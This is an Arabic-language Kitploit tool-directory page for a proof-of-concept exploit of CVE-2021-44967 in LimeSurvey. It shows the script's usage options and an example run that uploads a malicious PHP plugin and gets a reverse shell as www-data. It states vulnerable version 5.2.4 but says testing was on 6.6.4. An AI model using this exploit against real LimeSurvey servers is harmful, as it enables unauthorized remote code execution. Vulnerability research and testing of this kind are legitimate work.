Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/godylockz/cve-2021-44967
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubgodylockz/cve-2021-44967

CVE-2021-44967

استغلال لإثبات المفهوم لثغرة CVE-2021-44967 يمكّن من تنفيذ التعليمات البرمجية عن بُعد في LimeSurvey 5.2.4 عبر رفع إضافة ضارة، مع إمكانية إنشاء قشرة عكسية (reverse shell).

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44967: تنفيذ الأكواد عن بُعد (RCE) في LimeSurvey

الوصف

يمكن استخدام إثبات المفهوم (POC) هذا لاستغلال ثغرة CVE-2021-44967 لرفع وتنفيذ إضافة PHP خبيثة في LimeSurvey بصلاحيات المدير للحصول على قشرة عكسية (reverse shell).

توجد ثغرة تنفيذ الأكواد عن بُعد (RCE) في LimeSurvey 5.2.4 عبر وظيفة رفع وتثبيت الإضافات، والتي قد تسمح لمستخدم ضار عن بُعد برفع ملف كود PHP تعسفي.

الخطورة: 8.3 عالية المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

الاستخدام

root@kitploit:~
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
                         [--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]

POC for CVE-2021-44967 (LimeSurvey RCE)

options:
  -h, --help            show this help message and exit
  -t, --url URL         LimeSurvey Target URL
  -u, --username USERNAME
                        LimeSurvey username
  -p, --password PASSWORD
                        LimeSurvey password
  -f, --file FILE       Custom PHP payload file
  --listen-ip LISTEN_IP
                        Listening IP / Interface
  --listen-port LISTEN_PORT
                        Listening Port
  -a, --useragent USERAGENT
                        User agent to use when sending requests
  -x, --proxy PROXY     HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag

مثال

root@kitploit:~
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shelll ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

تم الاختبار على الإصدار 6.6.4 من LimeSurvey Community Edition.

المراجع

  • CVE-2021-44967
  • إثبات المفهوم الأصلي (POC)
تنزيل الأداة